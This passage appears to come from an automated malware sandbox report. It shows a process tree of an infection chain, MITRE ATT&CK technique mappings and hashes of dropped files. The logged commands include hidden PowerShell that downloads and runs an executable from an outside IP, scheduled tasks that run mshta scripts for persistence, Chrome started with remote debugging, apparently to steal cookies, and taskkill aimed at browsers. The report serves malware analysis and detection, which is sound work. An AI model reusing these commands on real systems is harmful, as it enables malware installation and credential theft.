        cmd /c copy /b 163531\Hotel.com + Dive + Enjoying + Spray + Expects + Valid + Remainder + Abc + Promoted + Amanda + Auction + Quoted 163531\Hotel.com
        8⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Revenge.mid + ..\Involves.mid + ..\Delta.mid + ..\Admission.mid K
        8⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\163531\Hotel.com
        
        Hotel.com K
        8⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:2364
      - C:\Users\Admin\AppData\Local\Temp\10352730101\q4jfn3p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352730101\q4jfn3p.exe"
        6⤵
        
        PID:11012
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:11704
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:2036
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc7984dcf8,0x7ffc7984dd04,0x7ffc7984dd10
        9⤵
        
        PID:924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1840,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:3
        9⤵
        
        PID:2452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2540,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:2
        9⤵
        
        PID:3464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2056,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8
        9⤵
        
        PID:6148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=3244 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:12548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:12560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:12696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:12760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4856,i,12358152023973300467,7770609478881876174,262144 --variations-seed-version --mojo-platform-channel-handle=4964 /prefetch:8
        9⤵
        
        PID:6272
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:10548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc7984dcf8,0x7ffc7984dd04,0x7ffc7984dd10
        9⤵
        
        PID:10648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:3800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffc7984dcf8,0x7ffc7984dd04,0x7ffc7984dd10
        9⤵
        
        PID:12212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1708,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=2496 /prefetch:3
        9⤵
        
        PID:24564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2468,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=2464 /prefetch:2
        9⤵
        
        PID:24392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2000,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:8
        9⤵
        
        PID:24412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=3208 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:11484
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=3240 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:7072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:11420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3180,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=4600 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:24624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4928,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:8
        9⤵
        
        PID:24828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=3792,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=3708 /prefetch:2
        9⤵
        
        PID:25204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=2540,i,10609128020894851886,4093300441536893606,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:8
        9⤵
        
        PID:25236
      - C:\Users\Admin\AppData\Local\Temp\10352740101\5919c4fd31.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352740101\5919c4fd31.exe"
        6⤵
        
        PID:10536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 0ntGlmaUhPl /tr "mshta C:\Users\Admin\AppData\Local\Temp\x2zopyo4z.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        
        PID:10612
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 0ntGlmaUhPl /tr "mshta C:\Users\Admin\AppData\Local\Temp\x2zopyo4z.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11084
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\x2zopyo4z.hta
        7⤵
        
        PID:10628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Y6DHGLWOFJABL35FH2SK1VI5MPGAVK3H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10960
        
        C:\Users\Admin\AppData\Local\TempY6DHGLWOFJABL35FH2SK1VI5MPGAVK3H.EXE
        
        "C:\Users\Admin\AppData\Local\TempY6DHGLWOFJABL35FH2SK1VI5MPGAVK3H.EXE"
        9⤵
        
        PID:8188
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10352750121\am_no.cmd" "
        6⤵
        
        PID:6504
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        Delays execution with timeout.exe
        
        PID:12964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:6532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:8364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8412
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "WtoM2maW2N0" /tr "mshta \"C:\Temp\nQc2UoGyf.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8904
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\nQc2UoGyf.hta"
        7⤵
        
        PID:8924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9072
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        
        PID:18336
      - C:\Users\Admin\AppData\Local\Temp\10352760101\8c65b7ff2c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352760101\8c65b7ff2c.exe"
        6⤵
        
        PID:9884
      - C:\Users\Admin\AppData\Local\Temp\10352780101\8e9fa719d2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352780101\8e9fa719d2.exe"
        6⤵
        
        PID:10700
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:12168
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:24820
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:25416
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:6956
      - C:\Users\Admin\AppData\Local\Temp\10352790101\7b30c1ad0d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352790101\7b30c1ad0d.exe"
        6⤵
        
        PID:12180
      - C:\Users\Admin\AppData\Local\Temp\10352800101\20b9be049d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352800101\20b9be049d.exe"
        6⤵
        
        PID:24800

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5968

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:964

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2452

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:3880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:1812

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\key.exe
1⤵
PID:5256

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3060

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:9028

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:12292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{1d83d36e-54d5-4686-89c7-4c57b0ec4a55}\bfdbd0ba-0260-4e63-b2fb-9728fb86ace2.cmd"ÿ
1⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:10828

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:7332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\HMraR8pCMpN9kYXC.exe
1⤵
PID:11024
- C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\HMraR8pCMpN9kYXC.exe
  C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\HMraR8pCMpN9kYXC.exe
  2⤵
  PID:3740
- - C:\Users\Admin\AppData\Local\Temp\WZcrrPYm\ahUe4CBNIIVIef4T.exe
    C:\Users\Admin\AppData\Local\Temp\WZcrrPYm\ahUe4CBNIIVIef4T.exe 3740
    3⤵
    PID:9100
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9100 -s 636
      4⤵
      Program crash
      PID:24428
- - C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\4CToToeeTJVx4ZNo.exe
    C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\4CToToeeTJVx4ZNo.exe 3740
    3⤵
    PID:25464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 11668 -ip 11668
1⤵
PID:18368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 11712 -ip 11712
1⤵
PID:18384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9100 -ip 9100
1⤵
PID:24320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 11428 -ip 11428
1⤵
PID:9612

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:24360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 11428 -ip 11428
1⤵
PID:24684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_b296ad91a_arkmon.sys

Filesize
390KB

MD5
7c924dd4d20055c80007791130e2d03f

SHA1
072f004ddcc8ddf12aba64e09d7ee0ce3030973e

SHA256
406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

SHA512
ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

Download Submit
C:\ProgramData\2vs0h4ohdt.exe

Filesize
1.1MB

MD5
4ddc793d17a7278474e622d34854705c

SHA1
7edc128eda8610a29266ee5f6ed88c152e27cf66

SHA256
f27f8dd63155dd7504fd6c4105c1792a29b4b3a07d55f8110df8cd315be729f9

SHA512
aec2938ff177ae2dcf4f59e17b375a67569b7de3c64ee6b5edf5accd631a8b8524359fa28f5b5c878fd1535258a4ba799698c2344ae77bb2cda09c29b58bd3f0

Download Submit
C:\ProgramData\aasr1\0riekx

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\aasr1\6x4wtr

Filesize
288KB

MD5
e051fce095755e21865454427419ae2e

SHA1
a88434e3f9fd536abdfd9b14956667839e8c4f71

SHA256
ebb8ed1c4223edcd6014ae0dd4529896fb5fc3a64cbff693aab0e1e0d3198492

SHA512
af321e6d8fa2be5ae4ec857dcf455d42b828950d8491f308427cf2b6a1bdd76c27d4eabf248f3b373f933611d88ee1a826d791507f25a39997cf54fdf9bd859b

Download Submit
C:\ProgramData\aasr1\dtjmy5

Filesize
6KB

MD5
dda82a30a731251fbbc458fe74f08e8e

SHA1
08172538ddc553204bf2a2720c877a0f2af75757

SHA256
1ea11306c911a724f06e1b257e66b9eee44bd07c750ba1d046f3ca9bd045d261

SHA512
7041159397f2d2ecf78c0da9437a0492b283dec3ffc929fb7071d2627558745848d8de21dc5567343a6834f8b8a1067236697ed2b2e0e762c441f34ec0e3a9e2

Download Submit
C:\ProgramData\gv3w4e37yc.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\rimoh\37gd2d

Filesize
160KB

MD5
9b85a4b842b758be395bc19aba64799c

SHA1
c32922b745c9cf827e080b09f410b4378560acb3

SHA256
ecc8d7540d26e3c2c43589c761e94638fc5096af874d7df216e833b9599c673a

SHA512
fad80745bb64406d8f2947c1e69817cff57cc504d5a8cdca9e22da50402d27d005988f6759eaa91f1f7616d250772c9f5e4ec2f98ce7264501dd4f436d1665f0

Download Submit
C:\ProgramData\rimoh\yct26fkng

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
734B

MD5
e192462f281446b5d1500d474fbacc4b

SHA1
5ed0044ac937193b78f9878ad7bac5c9ff7534ff

SHA256
f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60

SHA512
cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2B4150331B6BBCC10D5F983AF5F79ABC_07F11001FD41464F4CA10B08082B6854

Filesize
345B

MD5
8eaf67f672774f100bfd33d54d9a4f99

SHA1
486d55a48c792c24ace1e955390ed180e0a3771b

SHA256
304b467f9f94d4ddddbc28a1a58c842e6b2c1070a215f58f156a73c3dd4b0a58

SHA512
596040f330ebb57286c4fb5a6fc2c73e7eeceadc140f107969532ce4aa6b1d692ef22bbd64ea54c7f3c29963f7fc0709df475d39182164852a448a8b11fcab94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
afb2539d127e00d57abb8186bb85f679

SHA1
bb58477164cd396ebca095c3cc717387a84dd6d2

SHA256
